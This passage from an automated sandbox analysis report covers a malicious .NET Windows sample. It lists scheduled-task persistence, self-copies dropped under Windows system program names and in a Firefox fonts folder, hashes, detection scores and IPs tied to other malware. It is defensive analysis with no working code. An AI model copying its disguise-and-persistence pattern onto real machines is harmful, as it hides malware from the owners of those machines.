                • Execution Graph export aborted for target oFAjWuoHBq.exe, PID 1372 because it is empty
                • Execution Graph export aborted for target tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, PID 2272 because it is empty
                • Execution Graph export aborted for target tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, PID 3168 because it is empty
                • Execution Graph export aborted for target tcEcURjxxClvKHXzINDGbUbctpEdgO.exe, PID 6596 because it is empty
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                03:36:57Task SchedulerRun new task: ctfmon path: "C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe"
                03:36:57Task SchedulerRun new task: ctfmonc path: "C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe"
                03:36:57Task SchedulerRun new task: Registry path: "C:\Users\Public\AccountPictures\Registry.exe"
                03:36:57Task SchedulerRun new task: RegistryR path: "C:\Users\Public\AccountPictures\Registry.exe"
                03:36:57Task SchedulerRun new task: StartMenuExperienceHost path: "C:\Users\user\StartMenuExperienceHost.exe"
                03:36:57Task SchedulerRun new task: StartMenuExperienceHostS path: "C:\Users\user\StartMenuExperienceHost.exe"
                03:36:57Task SchedulerRun new task: tcEcURjxxClvKHXzINDGbUbctpEdgO path: "C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe"
                03:36:57Task SchedulerRun new task: tcEcURjxxClvKHXzINDGbUbctpEdgOt path: "C:\Program Files (x86)\autoit3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe"
                21:37:01API Interceptor6x Sleep call for process: tcEcURjxxClvKHXzINDGbUbctpEdgO.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                BEGET-ASRUSetup.exeGet hashmaliciousVidarBrowse
                • 45.130.41.93
                Setup.exeGet hashmaliciousVidarBrowse
                • 45.130.41.93
                xoJxSAotVM.exeGet hashmaliciousVidarBrowse
                • 5.101.153.57
                botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                • 185.155.118.34
                splppc.elfGet hashmaliciousUnknownBrowse
                • 81.200.117.158
                arm5.elfGet hashmaliciousUnknownBrowse
                • 193.168.46.153
                file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                • 87.236.16.19
                GNUCXbYadp.exeGet hashmaliciousDCRatBrowse
                • 5.101.153.48
                t8xf0Y1ovi.exeGet hashmaliciousDCRatBrowse
                • 185.50.25.59
                AYUGPPBj0x.exeGet hashmaliciousDCRatBrowse
                • 5.101.153.173

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Program Files (x86)\AutoIt3\645bc6bab0f65c

                Download File
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:ASCII text, with very long lines (360), with no line terminators
                Category:dropped
                Size (bytes):360
                Entropy (8bit):5.867147855537292
                Encrypted:false
                SSDEEP:6:DDDfHm0qRD6ZgRZCpEkbAHR6mB6VkOY//Wl71ggl5LwaWvgSREWAT4N3m4n:S0qRD6ZOCpRbK4mB8I//wJPLPoXRPk4r
                MD5:65337E1E01ADC71CA1C0B6102E1D7B04
                SHA1:6B585BCCE1BE7DC27980AD8A955AFD884DF1082D
                SHA-256:0E5802489D43DFCAB4DF9026583F383B7FB98A8DA94EE4771F5C580C77A54E84
                SHA-512:7EF8D2672B2A8FBE2E2C22C5CC9B647E319FA936A0261BD19B4D9BD621C2C7954A2EAF86A0D89B8AD4DD9578371570E02E70AB3196ACFB46BC96BFE7170F3EA0
                Malicious:false
                Preview:fQ6DDRxELIGfUWbvWGZi5SzXYsOZzSLFJsoTtfh6BfNry78CwmuRtdaNajpUCXP27AWlsHC0idgaEIiatLmMh4WpSa2J0M3nPVuxlXUoj4sQ6AJSAOl0uCUCoqTRP29Wj3KtXvzW18nnLFtRRjJmkC2NAsI4DDZr4WqD0Z5OYP9wZr0j7B9psWvgA6tpm5Sxj5tzZpb2o4OVDGyT1j7BEt8hkJD4qPlc6MNd7AJRkHBxIad3IayD8Qtz6LPPmhLYSvY13UV0Zpb7sKZKqJwQbiepcXhvv3oD5mfWBmAxE7nSzwHvwEjdu46uRsYfxjFfBXBGpCIDI8Le4M0qQv8qUKSBquFSNe9f2HQbuBFu

                C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe

                Download File
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):2403328
                Entropy (8bit):7.606495823005762
                Encrypted:false
                SSDEEP:49152:2QZEVRb3qgQujSIZijBW7vrGGzt2q5je54Ng3q1qrFBZT4:2GEVRagQujSei5GpZJCmqrZT
                MD5:97177514CAB51539083EF130F005BBD1
                SHA1:49E2661EE3E8F6FD6B06334B00543590ED8FE208
                SHA-256:500A74281DE1BC8E6EB4E08EB8705235F4436CCB209ECACA91FE4AD43A869015
                SHA-512:7CE6E7255D482B7C78F759098F9744F5F0EF462A79AD061D19F8036061B807963C924665BBE66E23E26A36990B5849D527B750AB6D0E9F6010CF4D665EC3D897
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 79%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................r$..6......N.$.. ....$...@.. ....................... %...........@...................................$.K.....$.......................%...................................................... ............... ..H............text...Tp$.. ...r$................. ..`.sdata.../....$..0...v$.............@....rsrc.........$.......$.............@..@.reloc........%.......$.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Program Files (x86)\AutoIt3\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe:Zone.Identifier

                Download File
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:true
                Preview:[ZoneTransfer]....ZoneId=0

                C:\Program Files\Mozilla Firefox\fonts\645bc6bab0f65c

                Download File
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:ASCII text, with very long lines (887), with no line terminators
                Category:dropped
                Size (bytes):887
                Entropy (8bit):5.896641342105787
                Encrypted:false
                SSDEEP:24:7PSgaLN4UgnR/HcGykPUVHKbnYsC8gWlwH022:7CCO8PUVHKbnZC66UZ
                MD5:B8AA55245CBCC7D768DD5294925E46EF
                SHA1:E0EB5D769BD7496F7B165AAF1B5992136E0D133E
                SHA-256:B3E0DE98BD7BD4E62D0BD4322A5EA40ED7F94C8C94ED2587ED766841919B3B3C
                SHA-512:D8A748E9BA809199C64A17D8062CB2879E2C7E73CC61D6CE5BC16CE27972DE0D8A5A437D0F97AFA354FFFFDE83D8D2E22F8B37D544E988005C1C657B41D63471
                Malicious:false
                Preview:Hj6XSzumyfv6YJAE6Mgb3BQZYuwhNQ8GPueUBsldv7zPV4RG1CuJDc9GSg9hDNYhhornoqDNkCp5LBDedpqKgyCwuYBetDZhiSrqMnbK8gjBwD4RdfEYhNBtm42QojehnHW3TWR0NfM9PB9qduAN9BAVQ8ESuKgZBBXorA8GONKCBCel4Mx4iQhlHBnUS8FD8w7NnV9dw49v17TOedYiXl0vewhpXnyPIGDOEQ7jMTIoRwuKsY0ykhpX6Mt1xUGIGunu4EJNfyVDdMdsBW78w9okbqS2hGv1N9hgIAQnPnTvLl3tsBzaXHVHFCTNwRpZDe0eo7jBGTtJp3ZzxiJgRUeGnabGrC0773srvYEvbxUDYMbMndaNIJIs9u1OfdUEcvMvKrEYeYEdAarb8OcNmnzyvArBh0P8dPkm9pC5ZBttEoriCZPQAGbz6YAK9C1nIGAu0FbTMgyk3FtHSJ9Hk87Wyuplp25WJFk8o7s786EdS051o210DuDKIo6FZ0oUlbbyevdUaBIo4dD7zy7wAFTZCaz9BnhIRt20ZHW2ZgaBlYPok8Qk21UfIBwE6dTxdAWLkNhrcFWdoRxnKKZCX7PaZXsXVS66NmhkBEEXbiIxf010NI3vDRZgu6wNeKWJJZQBuMlFGCkyyc4ig2JMYK35NA0FS03RL8oFkzFAgyoBqlsSBNrmAJv8gUytWgwQJTnzyz7qwJqkf1OlSiDFIRRCNpiQAWo9BY2W72dLQAz1dLcpFMaycrH2CkmIRrqZeqiH91oZE1yHbajBM3Kx5zhTQAUXQV4iUZWwmVqNiAul3AamBk5Xg3epJP08hQJs6PxBDwZ1N6O4E5aQjrVqZhBa5qnXfrpS1BonMYiPKEKkpjkNyjY05cT

                C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe

                Download File
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):2403328
                Entropy (8bit):7.606495823005762
                Encrypted:false
                SSDEEP:49152:2QZEVRb3qgQujSIZijBW7vrGGzt2q5je54Ng3q1qrFBZT4:2GEVRagQujSei5GpZJCmqrZT
                MD5:97177514CAB51539083EF130F005BBD1
                SHA1:49E2661EE3E8F6FD6B06334B00543590ED8FE208
                SHA-256:500A74281DE1BC8E6EB4E08EB8705235F4436CCB209ECACA91FE4AD43A869015
                SHA-512:7CE6E7255D482B7C78F759098F9744F5F0EF462A79AD061D19F8036061B807963C924665BBE66E23E26A36990B5849D527B750AB6D0E9F6010CF4D665EC3D897
                Malicious:true
                Antivirus:
                • Antivirus: ReversingLabs, Detection: 79%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................r$..6......N.$.. ....$...@.. ....................... %...........@...................................$.K.....$.......................%...................................................... ............... ..H............text...Tp$.. ...r$................. ..`.sdata.../....$..0...v$.............@....rsrc.........$.......$.............@..@.reloc........%.......$.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Program Files\Mozilla Firefox\fonts\tcEcURjxxClvKHXzINDGbUbctpEdgO.exe:Zone.Identifier

                Download File
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:true
                Preview:[ZoneTransfer]....ZoneId=0

                C:\Program Files\Windows Sidebar\Gadgets\26c12092da979c

                Download File
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:ASCII text, with very long lines (513), with no line terminators
                Category:dropped
                Size (bytes):513
                Entropy (8bit):5.853385694407891
                Encrypted:false
                SSDEEP:12:8s0mMg1js7N0e5i8sucfYzdiYWgk5OwVp0xyRTjDGUrK:8s0mVjs7NBAssYMYW90YHDK
                MD5:B38ADFF08665546ACAA73A0C8382AA22
                SHA1:404E7FADD82B04E1010D6E07D418626C784F9082
                SHA-256:D9A8A2347FA28D1DFB995A407FD375EB745072A5B6652A456E500372A156FC25
                SHA-512:62DBD782914E3ECAE1F9CEA3EB9DE254925AEBF94B3A46A7E7130447478945403E90564A1D2EF28AD6A622D684FE77018BAD5DCA2EE27473292625548C1C2C02
                Malicious:false
                Preview:XPJrYfooWdk6czFnjgVbqWoHIFdWLMV08sQ1qNt1HbxRCSaJRobthAzAlBiSCRcKIu7tiO7VweTOjWF0pTEgvlS73PQppbz08mJSVqlDrF6DrkbO5smsN6Zgc90S7SqVpdP6Mwe9sAzppPQSyBt6zGmCNn0V0SFZZlXOVeBJNmAMHt1Mthe6itgi0Msj6IIZ5ZPD1C6T9ktMGa5ewnmSyJ0qFyXIwcMEekRrdxVrkK689UcaQOxTg0lvjj8CoyhhXosfJOA9R5rnM2quW71hp3in9fH4yTCwnZkVm7QCOyBlI7ir2Oqq6A2eGEfnGFK825AxRVIYqzT017eB7aCkmVznhFPhbm5InDsN7uZgFS9HrBnJjeqpDkVgFXQMGl6E3KNyORDMBfeUVs6fcF776PFCrLIkeNaeV5Ogxz4SaeohGAKXbutAn9HnELGCJdryFA9ZdZsmLpgbli6qAuJtdZ1Vykcms1J6w0bFBv3BCGz7cqBgOZBYU8UqJnl37F4Tg

                C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe

                Download File
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):2403328
                Entropy (8bit):7.606495823005762
                Encrypted:false
                SSDEEP:49152:2QZEVRb3qgQujSIZijBW7vrGGzt2q5je54Ng3q1qrFBZT4:2GEVRagQujSei5GpZJCmqrZT
                MD5:97177514CAB51539083EF130F005BBD1
                SHA1:49E2661EE3E8F6FD6B06334B00543590ED8FE208
                SHA-256:500A74281DE1BC8E6EB4E08EB8705235F4436CCB209ECACA91FE4AD43A869015
                SHA-512:7CE6E7255D482B7C78F759098F9744F5F0EF462A79AD061D19F8036061B807963C924665BBE66E23E26A36990B5849D527B750AB6D0E9F6010CF4D665EC3D897
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 79%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................r$..6......N.$.. ....$...@.. ....................... %...........@...................................$.K.....$.......................%...................................................... ............... ..H............text...Tp$.. ...r$................. ..`.sdata.../....$..0...v$.............@....rsrc.........$.......$.............@..@.reloc........%.......$.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe:Zone.Identifier

                Download File
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:true
                Preview:[ZoneTransfer]....ZoneId=0

                C:\Users\Public\AccountPictures\Registry.exe

                Download File
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                Category:dropped
                Size (bytes):2403328
                Entropy (8bit):7.606495823005762
                Encrypted:false
                SSDEEP:49152:2QZEVRb3qgQujSIZijBW7vrGGzt2q5je54Ng3q1qrFBZT4:2GEVRagQujSei5GpZJCmqrZT
                MD5:97177514CAB51539083EF130F005BBD1
                SHA1:49E2661EE3E8F6FD6B06334B00543590ED8FE208
                SHA-256:500A74281DE1BC8E6EB4E08EB8705235F4436CCB209ECACA91FE4AD43A869015
                SHA-512:7CE6E7255D482B7C78F759098F9744F5F0EF462A79AD061D19F8036061B807963C924665BBE66E23E26A36990B5849D527B750AB6D0E9F6010CF4D665EC3D897
                Malicious:true
                Antivirus:
                • Antivirus: Avira, Detection: 100%
                • Antivirus: Joe Sandbox ML, Detection: 100%
                • Antivirus: ReversingLabs, Detection: 79%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................r$..6......N.$.. ....$...@.. ....................... %...........@...................................$.K.....$.......................%...................................................... ............... ..H............text...Tp$.. ...r$................. ..`.sdata.../....$..0...v$.............@....rsrc.........$.......$.............@..@.reloc........%.......$.............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Users\Public\AccountPictures\Registry.exe:Zone.Identifier

                Download File
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):26
                Entropy (8bit):3.95006375643621
                Encrypted:false
                SSDEEP:3:ggPYV:rPYV
                MD5:187F488E27DB4AF347237FE461A079AD
                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                Malicious:true
                Preview:[ZoneTransfer]....ZoneId=0

                C:\Users\Public\AccountPictures\ee2ad38f3d4382

                Download File
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:ASCII text, with very long lines (881), with no line terminators
                Category:dropped
                Size (bytes):881
                Entropy (8bit):5.90199845483913
                Encrypted:false
                SSDEEP:12:8YioT1+fjX5fmPk76AR4sLaFARGHFqH19bTWTA+JotgSda2btdK8bgLGiN1VR:8XoTEXVmPm5oFARYc3z3dXK8SDVR
                MD5:45A2C020098D39F6D272A99733CED4FC
                SHA1:6F4F7AC158FA9CB69CCB3902572975D5DE948DC4
                SHA-256:2920B55DCB0FE9C9E6B0CE7F6A2BBBA0C0301BD5BA8AB074A289476B60932C0B
                SHA-512:2EC37942755E24F282137C401B180F86AC41F2DCF0FA241A2EE87C9C74C18CF897817416EC8ADC6DFDB6B1B08FEFA54556828A0D76974C9F2A61DEFD55396234
                Malicious:false
                Preview:rPCkYL0FAZ46z0n9qmw5Y5PpOuyzgSO5AafP74e6aWulLxGprxCzCJewAWWnXBjrL96ZUYBwH0fBKneboJHtQY216tOki0iYxCZL1qUTvQsLoclW248O4zbxGEdkJaNRRGOHOSk8yx79qqNdI1sn2Ud7llFwMuJVCa3hNdHjUAZH2bHZ19cRrkZ7mRgnNxvEnm7PwpQpuIS14WEJdp4MR2ncB6466eWgOVdQe2nMtxhjRhCQMXJi3jwv8fN0vTsPvvnj3yplCsceUDKe4ouiVynojsR8pwaaESxf3dWXsigLGRa4Us5HiJ37I89Lgq5PRBaBQpkbRW0xSbhRRWo71T14Y0W5dL0CmR3E1YopHezMTGpqar3JC8Y8KfnaSp7GfxKBhca2s8zWdpkSKpevRrAo354VvNWchtqf5oJ7RBbDIBee5UPmLLyyxfImiEGemXzt9FWgggeQP6f1baab8uQV51raghZM46bvMue07sForhj0AQKHopg1GdyHX6A9GRWSfuoq5kdPoloXS1aPWRiOajos6XdBsFhZLQVPleMDMRNezbzggvnztH26F5uiHcgiEPLCgKn1FeCJVK3eh6e6cspEXYKpun6tuoajPx9WHwtOEtl5CPAK7kGVjHoH97HbiSYrtUPu7Iyp9a9oxPnemwwKhEAHJ2XKoRqvU3Lr9QNyvaWII9UtTmzwgOJoTHlEvoBrtNT3E5eWi7YHs19Jhn0Cc4PFugY1pIDGZpY4qbpYHcNizB6cIbgIy8Oz8NIihnqZ4SrDcEdG8c49rqQtj5tNl5Raaj6cSH0ewxohU3AD8aKWEPHR7Z8m3cy9AQn2IBx0laN3CsYq5pOLv5WLcoe3JOkT9ogEQH47mTvoCNPOA

                C:\Users\user\55b276f4edf653

                Download File
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:ASCII text, with very long lines (899), with no line terminators
                Category:dropped
                Size (bytes):899
                Entropy (8bit):5.903056383407969
                Encrypted:false
                SSDEEP:12:CVxqgthUYThHkKUB0f7PVerBzDzeo/RhRluOzHvAcAhktEOUMmXUTT1NQNWKvQn:0xqghUwHkKjr8Z/xJz4cCkEvET/ovQn
                MD5:485B5E53DEAB0E068BF976D8610ED3FE
                SHA1:8420520739388D7765DC844520F121CA7490665A
                SHA-256:D95C76F3D8C37182C6F47D3F51FAA6F090530434447627B5B9B0B778E30D30C0
                SHA-512:E0F19BEDB06ECFBA583B34805677E0B851269A9C1EF7376F2BF33B51CF2BCE5310B601BBAE7459D11FD50C641814046D25046306DD17EA92A5DFB4FDD7747EEC
                Malicious:false
                Preview:baeg4rWz34XMUayvRjcKsJOZP21hWFWabKyqaarlYzIT1Cq12c6Cw4LSMFRB0zcxh7uKmHV010w3A5hNMAp4JUog9feUJpujWVv4RfOuHFK5IRSQhDyzJhoNSNKGmAqMGNgpJn5qv4wDJsYrNNwF14ZzrilDUHIHZ8z5vnH4IIEOukEjzd3YNkULxr8lB1VnwpoK3d5kG17s0KEGdBO1Ot3ynnHEof3QwacF63qWhTRVnlUmn1H9neZDv0gPV15l8q6Zs8KkV2T4biLBTebwX3nRBZTGXaAqYqX6p44orhouLelNoe60aINEDoYToEN52ngvLOWYkwF0P2GgxGb2dJPPcS3Agk9nUt2h80BaIiQoDXyKi2fimUbsXQS2VW29wbgg9ih7EAu53lMFdscnFbA9SKJsiIEvpQ1l1SK9UidmkfzwDMZn4O4VbhOzZzZ568PmtlOLhcTh8YYwUWoVtb1bVfKTDVkeIhqmPMCc8NGb5XXDIceCLDMeHyRNb4IL2yYaswgITLWgVZf7IHLl0hSFVLeb5zBDF4jH96UW5WsAqqJrSTFUtgVUfTFhRFNeKTab0Y8MwzpdzSYpCxIlurUiiOlq0xE0JNzXPr04V2h401eM4aee6lud822mwRW8uzUmcAZU6OQ1JZrrtZvZSk3hcWYXzOIDgjJBg2t4AKhsU3TiKL2Wg6qK5wJFlCesFNVkQqK1p1YHDLMjDzMoVvgk39FusnS8qymHitSdABrphiHtjkCwz0XUqurQlZIBiabOjFBThtnTE1CU2VKHkgIzaRbxCB1k3pGGG2KejtOGMEQysWYQPAbBSlySoOQf1CaZv6O9Kqi1RCmWBmFqmlV2OEyeE20VctOKn1DwHZFicjuP8bQBIk2QqiLqHt4S0NZ

                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Registry.exe.log

                Download File
                Process:C:\Users\Public\AccountPictures\Registry.exe
                File Type:CSV text
                Category:dropped
                Size (bytes):1281
                Entropy (8bit):5.370111951859942
                Encrypted:false
                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                MD5:12C61586CD59AA6F2A21DF30501F71BD
                SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                Malicious:false
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\StartMenuExperienceHost.exe.log

                Download File
                Process:C:\Users\user\StartMenuExperienceHost.exe
                File Type:CSV text
                Category:dropped
                Size (bytes):1281
                Entropy (8bit):5.370111951859942
                Encrypted:false
                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                MD5:12C61586CD59AA6F2A21DF30501F71BD
                SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                Malicious:false
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ctfmon.exe.log

                Download File
                Process:C:\Program Files\Windows Sidebar\Gadgets\ctfmon.exe
                File Type:CSV text
                Category:dropped
                Size (bytes):1281
                Entropy (8bit):5.370111951859942
                Encrypted:false
                SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhPKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhA2
                MD5:12C61586CD59AA6F2A21DF30501F71BD
                SHA1:E6B279DC134544867C868E3FF3C267A06CE340C7
                SHA-256:EC20A856DBBCF320F7F24C823D6E9D2FD10E9335F5DE2F56AB9A7DF1ED358543
                SHA-512:B0731F59C74C9D25A4C82E166B3DC300BBCF89F6969918EC748B867C641ED0D8E0DE81AAC68209EF140219861B4939F1B07D0885ACA112D494D23AAF9A9C03FE
                Malicious:false
                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\S

                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\oFAjWuoHBq.exe.log

                Download File
                Process:C:\Users\user\Desktop\oFAjWuoHBq.exe
                File Type:ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):1915
                Entropy (8bit):5.363869398054153
                Encrypted:false
                SSDEEP:48:MxHKQ71qHGIs0HKCYHKGSI6oPtHTHhAHKKkrJHVHpHNpaHKlT4x:iq+wmj0qCYqGSI6oPtzHeqKkt1Jtpaq2
                MD5:E6E3A2B5063C33228E2749DC291A1D3D
                SHA1:F3F32E2F204DE9AFA50D5DE1C132A8039C5A315C
